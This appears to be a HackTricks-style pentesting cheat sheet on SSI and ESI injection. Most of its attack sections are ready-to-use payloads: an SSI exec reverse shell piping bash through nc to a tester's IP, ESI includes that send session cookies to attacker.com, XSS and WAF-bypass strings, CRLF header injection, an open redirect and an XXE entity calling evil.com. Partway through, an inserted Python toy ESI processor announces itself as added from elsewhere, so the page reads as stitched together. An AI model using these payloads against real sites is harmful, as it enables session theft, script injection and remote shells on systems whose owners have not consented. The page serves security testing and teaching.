Server Side Inclusion/Edge Side Inclusion Injection

tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Server Side Inclusion Basic Information

(Introduction taken from Apache docs)

SSI (Server Side Includes) are directives that are placed in HTML pages and evaluated on the server while the pages are being served. They let you add dynamically generated content to an existing HTML page without having to serve the entire page via a CGI program or other dynamic technology.
For example, you might place a directive into an existing HTML page, such as:

```html
<!--#echo var="DATE_LOCAL" -->
```

And, when the page is served, this fragment will be evaluated and replaced with its value:

```text
Tuesday, 15-Jan-2013 19:28:54 EST
```

The decision of when to use SSI, and when to have your page entirely generated by some program, is usually a matter of how much of the page is static and how much needs to be recalculated every time the page is served. SSI is a great way to add small pieces of information, such as the current time shown above. But if a majority of your page is being generated at the time it is served, you need to look for some other solution.

You can infer the presence of SSI if the web application uses files with the extensions .shtml, .shtm or .stm, but that is not the only case.

A typical SSI expression has the following format:

```html
<!--#directive param="value" -->
```

Check:

```javascript
// Document name
<!--#echo var="DOCUMENT_NAME" -->
// Date
<!--#echo var="DATE_LOCAL" -->

// File inclusion
<!--#include virtual="/index.html" -->
// Including files (same directory)
<!--#include file="file_to_include.html" -->
// CGI Program results
<!--#include virtual="/cgi-bin/counter.pl" -->
// Including virtual files (same directory)
<!--#include virtual="file_to_include.html" -->
// Modification date of a file
<!--#flastmod file="index.html" -->

// Command exec (Windows)
<!--#exec cmd="dir" -->
// Command exec (Unix)
<!--#exec cmd="ls" -->
// Reverse shell
<!--#exec cmd="mkfifo /tmp/foo;nc <PENTESTER IP> <PORT> 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->

// Print all variables
<!--#printenv -->
// Setting variables
<!--#set var="name" value="Rich" -->
```

Edge Side Inclusion

Caching dynamic content is a problem because part of the content may differ the next time it is retrieved. That is what ESI is for: ESI tags mark the dynamic content that must be generated before the cached version is sent.
If an attacker is able to inject an ESI tag into cached content, he may be able to inject arbitrary content into the document before it is sent to the users.

ESI Detection

The following header in a response from the server means the server is using ESI:

```
Surrogate-Control: content="ESI/1.0"
```

If you cannot find this header, the server may be using ESI anyway.
A blind exploitation approach can also be used, since the request should arrive at the attacker's server:

```javascript
// Basic detection
hell<!--esi-->o
// If the previous is reflected as "hello", it's vulnerable

// Blind detection
<esi:include src=http://attacker.com>

// XSS Exploitation Example
<esi:include src=http://attacker.com/XSSPAYLOAD.html>

// Cookie Stealer (bypass httpOnly flag)
<esi:include src=http://attacker.com/cookie_stealer.php?c=$(HTTP_COOKIE)>

// Include private local files (not LFI per se)
<esi:include src="supersecret.txt">

// Valid for Akamai, sends debug information in the response
<esi:debug/>
```

ESI exploitation

GoSecure created a table to understand possible attacks that we can try against different ESI-capable software, depending on the functionality supported:

  • Includes: Supports the <esi:include> directive
  • Vars: Supports the <esi:vars> directive. Useful for bypassing XSS filters
  • Cookie: Document cookies are accessible to the ESI engine
  • Upstream Headers Required: Surrogate applications will not process ESI statements unless the upstream application provides the headers
  • Host Allowlist: In this case, ESI includes are only possible from allowed server hosts, making SSRF, for example, only possible against those hosts

| Software | Includes | Vars | Cookies | Upstream Headers Required | Host Allowlist |
| --- | --- | --- | --- | --- | --- |
| Squid3 | Yes | Yes | Yes | Yes | No |
| Varnish Cache | Yes | No | No | Yes | Yes |
| Fastly | Yes | No | No | No | Yes |
| Akamai ESI Test Server (ETS) | Yes | Yes | Yes | No | No |
| NodeJS esi | Yes | Yes | Yes | No | No |
| NodeJS nodesi | Yes | No | No | No | Optional |

XSS

The following ESI directive will load an arbitrary file inside the response of the server

```xml
<esi:include src=http://attacker.com/xss.html>
```

Bypass client-side XSS protection

```xml
x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
```

Use <!--esi--> to bypass WAFs:

```xml
<scr<!--esi-->ipt>aler<!--esi-->t(1)</sc<!--esi-->ript>
<img+src=x+on<!--esi-->error=ale<!--esi-->rt(1)>
```

  • Steal the cookie remotely

```xml
<esi:include src=http://attacker.com/$(HTTP_COOKIE)>
<esi:include src="http://attacker.com/?cookie=$(HTTP_COOKIE{'JSESSIONID'})" />
```

  • Steal an HTTP_ONLY cookie with XSS by reflecting it in the response:

```bash
# This will reflect the cookies in the response
<!--esi $(HTTP_COOKIE) -->
# Reflected XSS (you can put '"><svg/onload=prompt(1)>' URL encoded, and URL encode everything to send it in the HTTP request)
<!--esi/$url_decode('"><svg/onload=prompt(1)>')/-->

# It's possible to put more complex JS code to steal cookies or perform actions
```
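The following toy ESI processor, added here and not code from the page, GoSecure or any real surrogate, shows mechanically why the `hell<!--esi-->o` detection probe above returns `hello`, how the `<esi:assign>`/`<esi:vars>` payload reassembles `<script>`, and how `$(HTTP_COOKIE)` and `$(HTTP_COOKIE{'JSESSIONID'})` leak through both an `<esi:include src=...>` fetch and a reflected `<!--esi ... -->`. Its semantics are an assumption reduced from the ESI 1.0 language; `attacker.com` is an in-memory dict (`ATTACKER_SERVER`) and `fake_fetch` stands in for the surrogate's outbound HTTP request.

```python
"""Toy ESI processor: why `hell<!--esi-->o` comes back as `hello` and how the
cookie payloads leak $(HTTP_COOKIE).

Added example, not code from the page, GoSecure or any real surrogate (Akamai,
Varnish, Squid...). The semantics are an assumption reduced from the ESI 1.0
language: <!--esi ... --> unwrapping, <esi:assign>, <esi:vars>, <esi:include>,
$(VAR), $(VAR{'key'}) and $url_decode('...'). The "attacker server" is a dict.
"""
import re
from urllib.parse import unquote

ESI_COMMENT = re.compile(r"<!--esi(.*?)-->", re.S)
ASSIGN = re.compile(r"""<esi:assign\s+name="(\w+)"\s+value="'([^']*)'"\s*/>""")
VARS = re.compile(r"""<esi:vars\s+name="([^"]*)"\s*/>""")
INCLUDE = re.compile(r"""<esi:include\s+src=(?:"([^"]*)"|(\S+?))\s*/?>""")
VAR_REF = re.compile(r"\$\((\w+)(?:\{'([^']*)'\})?\)")   # $(VAR) / $(VAR{'key'})
URL_DECODE = re.compile(r"\$url_decode\('([^']*)'\)")

# Constructed stand-in for attacker.com; a real surrogate would make an HTTP request.
ATTACKER_SERVER = {"http://attacker.com/xss.html": "<script>alert(1)</script>"}


def fake_fetch(url):
    """Look the URL up in the fake attacker server, ignoring the query string."""
    return ATTACKER_SERVER.get(url.split("?", 1)[0], "")


class EsiContext:
    """Request data the surrogate exposes to the ESI language."""

    def __init__(self, cookies, fetch=fake_fetch):
        self.cookies = dict(cookies)   # name -> value, from the client's Cookie header
        self.fetch = fetch             # callable(url) -> body
        self.assigned = {}             # variables set with <esi:assign>
        self.fetched_urls = []         # every URL the surrogate requested (the leak record)

    def lookup(self, name, key):
        if name == "HTTP_COOKIE":
            if key is None:
                return "; ".join(f"{k}={v}" for k, v in self.cookies.items())
            return self.cookies.get(key, "")
        return self.assigned.get(name, "")


def expand_vars(text, ctx):
    """Expand $(VAR), $(VAR{'k'}) and $url_decode('...') in `text`."""
    text = VAR_REF.sub(lambda m: ctx.lookup(m.group(1), m.group(2)), text)
    return URL_DECODE.sub(lambda m: unquote(m.group(1)), text)


def process_esi(body, ctx):
    """Process one response body the way a surrogate does before serving it."""
    # 1. <!--esi ... -->: the markers are dropped and the inside is processed.
    #    A non-ESI client sees a comment; the surrogate sees live syntax.
    body = ESI_COMMENT.sub(lambda m: m.group(1), body)

    # 2. <esi:assign name="x" value="'...'"/> defines a variable and emits nothing.
    def do_assign(m):
        ctx.assigned[m.group(1)] = m.group(2)
        return ""
    body = ASSIGN.sub(do_assign, body)

    # 3. <esi:vars name="$(x)"/> emits the expanded value, so "<s" + $(var1) + ">"
    #    reassembles <script> after a client-side filter has looked at the page.
    body = VARS.sub(lambda m: expand_vars(m.group(1), ctx), body)

    # 4. <esi:include src=...>: variables in src are expanded *before* the fetch,
    #    which is how $(HTTP_COOKIE) ends up in a request to attacker.com.
    def do_include(m):
        src = m.group(1) if m.group(1) is not None else m.group(2)
        url = expand_vars(src, ctx)
        ctx.fetched_urls.append(url)
        return ctx.fetch(url)
    body = INCLUDE.sub(do_include, body)

    # 5. Anything left over (e.g. a bare $(HTTP_COOKIE) unwrapped from a comment).
    return expand_vars(body, ctx)
```

`ctx.fetched_urls` is the part to look at: it records the URL the surrogate requested after variable expansion, which is exactly what an attacker's listener would receive. Because the include is fetched by the cache and not by the browser, the `HttpOnly` flag offers no protection, which is the page's point about bypassing it.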

Private Local File

Do not confuse this with "Local File Inclusion":

```markup
<esi:include src="secret.txt">
```

CRLF

```markup
<esi:include src="http://anything.com%0d%0aX-Forwarded-For:%20127.0.0.1%0d%0aJunkHeader:%20JunkValue/"/>
```

Open Redirect

The following will add a Location header to the response:

```bash
<!--esi $add_header('Location','http://attacker.com') -->
```

Add Header

  • Add a header to the forced request

```xml
<esi:include src="http://example.com/asdasd">
<esi:request_header name="User-Agent" value="12345"/>
</esi:include>
```

  • Add a header to the response (useful to bypass "Content-Type: text/json" in a response with XSS)

```bash
<!--esi/$add_header('Content-Type','text/html')/-->

<!--esi/$(HTTP_COOKIE)/$add_header('Content-Type','text/html')/$url_decode($url_decode('"><svg/onload=prompt(1)>'))/-->

# Check the number of url_decode calls to know how many times you can URL encode the value
```

CRLF in Add header (CVE-2019-2438)

```xml
<esi:include src="http://example.com/asdasd">
<esi:request_header name="User-Agent" value="12345
Host: anotherhost.com"/>
</esi:include>
```

Akamai debug

This will return debug information in the response:

```xml
<esi:debug/>
```

ESI + XSLT = XXE

It is possible to use eXtensible Stylesheet Language Transformations (XSLT) syntax in ESI by specifying the value xslt for the dca parameter. This may allow abusing XSLT to create and exploit an XML External Entity (XXE) vulnerability:

```xml
<esi:include src="http://host/poc.xml" dca="xslt" stylesheet="http://host/poc.xsl" />
```

XSLT file:

```xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE xxe [<!ENTITY xxe SYSTEM "http://evil.com/file" >]>
<foo>&xxe;</foo>
```

Check the XSLT page:

{{#ref}} xslt-server-side-injection-extensible-stylesheet-language-transformations.md {{#endref}}

References

Brute-Force Detection List

{{#ref}} https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssi_esi.txt {{#endref}}
